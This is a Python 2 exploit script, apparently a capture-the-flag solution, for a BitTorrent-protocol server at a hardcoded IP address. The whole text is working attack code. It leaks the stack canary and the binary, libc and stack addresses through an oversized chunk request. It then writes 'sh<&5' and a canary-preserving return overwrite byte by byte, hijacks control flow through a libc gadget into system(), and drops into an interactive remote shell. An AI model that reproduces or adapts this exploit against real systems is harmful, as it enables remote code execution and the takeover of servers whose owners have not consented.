#!/usr/bin/python
import struct
import socket
import telnetlib

SERVER = ('88.198.89.222', 1234)
MAGIC = '\x13BitTorrent protocol'

binary = open('server').read()

def setup(f):
    info_hash = '7bf10a4619352e13935c3dfdd58912062717f95d'

    f.write(MAGIC)
    f.write('\x00' * 8)
    f.write(info_hash.decode('hex'))
    f.write('B' * 20) # peer_id

    f.read(len(MAGIC) + 8 + 20 + 20)
    f.read(7) # bitmap
    f.read(5) # unchoke

def request_chunk(f, index, begin, length):
    payload = struct.pack('>I', 0xd)
    payload += '\x06'
    payload += struct.pack('>I', index)
    payload += struct.pack('>I', begin)
    payload += struct.pack('>I', length)
    f.write(payload)

    length = struct.unpack('>I', f.read(4))[0]
    assert f.read(1) == '\x07'
    f.read(8)
    return f.read(length - 9)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(SERVER)
f = s.makefile('rw', bufsize=0)
setup(f)

data = request_chunk(f, 0, 14736, 1168)
stack_canary = struct.unpack('<Q', data[1032:1040])[0]
binary_addr = struct.unpack('<Q', data[1064:1072])[0]
binary_base = binary_addr - 0x24E2
libc_addr = struct.unpack('<Q', data[1160:1168])[0]

stack_addr = struct.unpack('<Q', data[1056:1064])[0]
buf_addr = stack_addr - 0x480

libc_base = libc_addr - 0x21de5

print 'stack_canary =', hex(stack_canary)
print 'binary_base =', hex(binary_base)
print 'libc_base =', hex(libc_base)
print 'buf_addr =', hex(buf_addr)
f.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(SERVER)
f = s.makefile('rw', bufsize=0)
setup(f)
'''
263a1:   48 8b 7c 24 38          mov    0x38(%rsp),%rdi
263a6:   44 89 54 24 08          mov    %r10d,0x8(%rsp)
263ab:   4c 8b 54 24 20          mov    0x20(%rsp),%r10
263b0:   41 ff d2                callq  *%r10
'''
gadget = libc_base + 0x263a1

system = libc_base + 0x46320

def write1(f, offset, byte):
    i = binary[offset:].find(byte)
    if i == -1:
        print 'Missing byte: %02x' % ord(byte)
        assert False
    print 'Writing %02x at offset %d' % (ord(byte), offset)
    request_chunk(f, 0, i, offset + 1)

def write8(f, offset, value):
    data = struct.pack('<Q', value)
    for i in xrange(7, -1, -1):
        write1(f, offset + i, data[i])

cmd = 'sh<&5\0'
for i in xrange(len(cmd) - 1, -1, -1):
    write1(f, 0x470 + i, cmd[i])

write8(f, 0x430 + 0x38, buf_addr + 0x470)
write8(f, 0x430 + 0x20, system)
write8(f, 0x428, gadget)
write8(f, 0x408, stack_canary)

raw_input()

payload = struct.pack('>I', 1)
payload += '\x07'
f.write(payload)

print 'done'

t = telnetlib.Telnet()
t.sock = s
t.interact()